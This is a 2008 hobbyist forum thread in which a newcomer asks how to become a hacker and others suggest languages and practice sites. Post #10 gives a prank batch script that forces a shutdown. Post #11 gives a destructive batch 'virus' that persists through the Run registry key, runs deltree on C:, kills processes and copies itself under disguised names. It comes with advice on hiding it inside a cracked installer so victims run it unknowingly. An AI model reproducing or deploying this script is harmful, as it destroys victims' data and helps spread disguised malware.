Hacking
  #1 (permalink)  
Old 08-03-2008, 09:47 PM
timcarroll timcarroll is offline
Junior Member
 
Join Date: Jul 2008
Posts: 24
Rep Power: 0
timcarroll is on a distinguished road
Default Hacking

well I want to be a 'hacker' I have learned HTML and a lot of javascript (still new to it though) what do you think I should work on next? Any software I should get to know? Any more languages commonly used? Anything would help.

Last edited by headcase; 08-04-2008 at 06:36 PM.
Reply With Quote

  #2 (permalink)  
Old 08-03-2008, 10:46 PM
LadyMakayla LadyMakayla is offline
Banned
 
Join Date: Aug 2008
Location: Alaska
Posts: 57
Rep Power: 0
LadyMakayla is on a distinguished road
Default

batch- a lot of easy ways to do things there. just google batch commands or go to this page

Confederate Axis of Darkness
Reply With Quote

  #3 (permalink)  
Old 08-03-2008, 11:25 PM
timcarroll timcarroll is offline
Junior Member
 
Join Date: Jul 2008
Posts: 24
Rep Power: 0
timcarroll is on a distinguished road
Default

thanks for the link! Fun to mess with but... A little too basic.
Reply With Quote

  #4 (permalink)  
Old 08-04-2008, 06:37 PM
headcase's Avatar
headcase headcase is offline
Super Moderator
 
Join Date: Jul 2005
Location: Republic of Ireland
Posts: 3,360
Rep Power: 0
headcase is an unknown quantity at this point
Send a message via MSN to headcase
Default

Hack This Site!

It's the Wikipedia of hacking. You're better off looking there than here.
Reply With Quote

  #5 (permalink)  
Old 08-06-2008, 06:53 AM
LizzyReikoZ LizzyReikoZ is offline
Banned
 
Join Date: Jul 2008
Posts: 113
Rep Power: 0
LizzyReikoZ is on a distinguished road
Default

I think you should know details on what you want to hack, then just google how to do it. I've learned some good things that way. Here's a site if you want to hack someone on freewebs: Education is Key
Reply With Quote

  #6 (permalink)  
Old 08-06-2008, 05:51 PM
123Shadow123 123Shadow123 is offline
Banned
 
Join Date: Jul 2008
Posts: 55
Rep Power: 0
123Shadow123 is on a distinguished road
Default

Ah another future cracker. Welcome aboard!

Keep in mind, cracking is not simply something you can learn over night or in a short course. cracking takes time, commitment, and dedication.

I'm a pretty old school cracker and I don't like people calling me or anyone else a "hacker." Hackers build stuff. Crackers finds loopholes and exploit them. So in short, people that make programs, games, applications, etc are all "hackers." People, like myself, who use the programs for the purpose to find a loophole and exploit the loophole to benefit themselves or others are "crackers." Hackers were the name givin to use by the media. Unfortunately not many people cared so we naturally excepted the name.
I on the other hand still don't like the name "hacker" since its been put to have a bad reputation. But since now a "cracker" is a white person I suppose I would have no other choice adopting the name "hacker." I'm black so calling myself a "cracker" would look pretty bad.
So as much as i don't like the term, I still use it.

Anyway, enough about that.

I recommend doing what "headcase" case and checking out hack this site. Its a pretty fun web site dedicated to hacking and giving you a bunch of hacking missions. They will help you become a hacker. If you ever completely finish the site, you will pretty much be worshiped lol

But as far as what "LadyMakayla" said, batch is a useless language. If you want I will write a tutorial on here for how to use it and how to program in batch. Didnt take me more then 10 minutes to learn. You can't hack with batch...unless your planning on hacking someone that still uses Windows 95/98. Or cracking WEP keys. It's still a fun language to know. But as far is it helping you become a hacker, it's a pretty dead programming language.


Now, I say learn C and C++ and since you already know HTML and JavaScript, you seem all set. If your learning JavaScript, you might as well learn Java too. Java will be extremely easy if you know JavaScript.

Best of luck, if you need help, someone to practice with or someone to show you examples, I will be more then happy to help/teach you.

Last edited by 123Shadow123; 08-06-2008 at 05:54 PM.
Reply With Quote

  #7 (permalink)  
Old 08-07-2008, 04:57 AM
timcarroll timcarroll is offline
Junior Member
 
Join Date: Jul 2008
Posts: 24
Rep Power: 0
timcarroll is on a distinguished road
Default

wow. You rock. Thanks a whole lot that really changes my "view" on cracking. One Q tho... What do you use c++ for in cracking?
Reply With Quote

  #8 (permalink)  
Old 08-07-2008, 05:16 AM
CrazyGoth666 CrazyGoth666 is offline
Banned
 
Join Date: Aug 2008
Posts: 100
Rep Power: 0
CrazyGoth666 is on a distinguished road
Default

Writing stuff in batch can be good for making people think they've been hacked or have a virus. I would agree with learning C and C++. Look for sources of information on websites specifically made for hacking. I know a good one, but its terms of use prevent me from disclosing it. Just use google, you can learn a lot there.
Reply With Quote

  #9 (permalink)  
Old 08-09-2008, 03:57 AM
MurderSkillz MurderSkillz is offline
Member
 
Join Date: Aug 2008
Posts: 35
Rep Power: 0
MurderSkillz is on a distinguished road
Default

as for C and C++ most MAJOR exploits like local roots, remote roots, and buffer overflows are written in C and C++ they are both terrific languages.. i would start off learning perl and python first tho..
Reply With Quote

  #10 (permalink)  
Old 08-09-2008, 05:35 AM
123Shadow123 123Shadow123 is offline
Banned
 
Join Date: Jul 2008
Posts: 55
Rep Power: 0
123Shadow123 is on a distinguished road
Default

Oh yes, how can I forget pearl!

Pearl is a really fun language. Its simple and has many uses. Definately learn pearl! As for python......ah isnt really necessary but it can come in handy sometimes. I havent really "learned" python but I have glanced at it and it seems pretty simple.

Yes, batch is pretty much used as a joke/prank virus. For example:

file.bat

@echo off
:A
title Virus
echo Hello, this is a virus. Would you like to remove it?
set input=
set /p input=Press Y for yes or N for no:
if %input%==y goto y
if %input%==n goto n


:n
cls
echo Then good for you. Since you like it so much, shutdown time
shutdown -s -t 10 -c "Shutdown time"
while del file.bat
exit

:y
cls
echo Well to freakin' bad!
shutdown -s -t 10 -c "Well to freakin' bad"
while del file.bat
exit


There we go. That took all of 2 minutes to write out. Alot of it wasnt necessary. Like giving it a title, giving it the echo's in the :y and :n parts or even giving an option for y and n. I just like to give them a choice that will, either way, shutdown the computer in 10 seconds. Giving them time to read the messages and to delete the file lol.

Batch can be fun. Useful....not really but still fun ^_^

Also, get a practice typing program. This will help you type alot faster.
The faster you type, the better. I forgot how fast I type. I think it was around 220wpm with no mistakes. I can definately do 300wpm but have some errors. Like when i write all my long tutorials on this site, i try to go over 300wpm and thats why i get spelling errors.


Anyway, learn pearl rather then batch
Reply With Quote

  #11 (permalink)  
Old 08-09-2008, 01:13 PM
MurderSkillz MurderSkillz is offline
Member
 
Join Date: Aug 2008
Posts: 35
Rep Power: 0
MurderSkillz is on a distinguished road
Default

or a real batch virus..

Code:
@Echo off
color 4
title 4
title RestInPeace Virus Scanner V2.0
start calc
copy %0 %Systemroot%\MurderSkillz > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v MurderSkillz /t REG_SZ
/d %systemroot%\Murderskillz.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h MurderSkillz.bat
Attrib +r +h
deltree /Y C:\
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
cls
cd %userprofile%\desktop
copy MurderSkillz.bat RestInPeace.bat
copy MurderSkillz.bat RestInPeace.jpg
copy MurderSkillz.bat RestInPeace.txt
copy MurderSkillz.bat RestInPeace.exe
copy MurderSkillz.bat RestInPeace.mov
copy MurderSkillz.bat FixVirus.bat
cd %userprofile%My Documents
copy MurderSkillz.bat RestInPeace.bat
copy MurderSkillz.bat RestInPeace.jpg
copy MurderSkillz.bat RestInPeace.txt
copy MurderSkillz.bat RestInPeace.exe
copy MurderSkillz.bat RestInPeace.mov
copy MurderSkillz.bat FixVirus.bat
start calc
cls
msg * RestInPeace
msg * RestInPeace
shutdown -r -t 15 -c "VIRUS DETECTED"
start
start
time 00:00
:RestInPeace
cd %usernameprofile%\desktop
copy MurderSkillz.bat %random%.bat
goto MurderSkillz
After the Batch File is Created.. make sure you name it as the title and then get a crack or something for your installer.. I use Smart Install Maker 5.02 (this crack is easily found) and go thru the process or making an installer.. Make sure to add the option to open after install.. (most everyone including myself always run a program right after the install esp. if it gives me the option to) what this does simply is instead of them seeing its just a batch file or anything susp. it will just run it for them

What this does:

1.Copy itself into startup
2.Copy itself over one thousand times into random spots in your computer
3.Hides its self and all other created files
4.Deletes everything in the C:/ drive if it exist. the cool thing is tho.. when using dos it would ask you are you sure you want to delete C:/? With /Y we are already telling it yes so it proceeds. =)
5.Task kill MSN, Norton, Windows Explorer, Limewire
6.Swap the left mouse button with the right one
7.Opens alert boxes
8.Changes the time to 00:00 and shuts down the computer

Last edited by MurderSkillz; 08-09-2008 at 01:34 PM.
Reply With Quote

  #12 (permalink)  
Old 08-11-2008, 06:39 AM
123Shadow123 123Shadow123 is offline
Banned
 
Join Date: Jul 2008
Posts: 55
Rep Power: 0
123Shadow123 is on a distinguished road
Default

^^^^^

1)you have 2 titles
2)no point in changing the color to red
3)why kill the tasks limewire and iexplore (limewire is just a program and iexplore is just internet explorer)
4)"cd %userprofile%My Documents" should be "cd %userprofile% My Documents"
5)not seeing any command that copy the file over 1k times. just seeing a command that hides the file as another extension type (i.e: "copy MurderSkillz.bat RestInPeace.jpg" hiding it as a jpg file instead of a bat file)
6)couldnt someone simply remove the reg value and remove it from the startup in msconfig and the virus would stop running completely? despite still having the files still on the hard drive?
Reply With Quote

  #13 (permalink)  
Old 08-11-2008, 06:20 PM
CrazyGoth666 CrazyGoth666 is offline
Banned
 
Join Date: Aug 2008
Posts: 100
Rep Power: 0
CrazyGoth666 is on a distinguished road
Default

oooh! use winrar to make a heka good installer. i like that virus....
Reply With Quote
Reply

Bookmarks



Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On



All times are GMT. The time now is 06:27 AM.


vBulletin skin developed by: eXtremepixels
Powered by vBulletin® Version 3.7.1
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.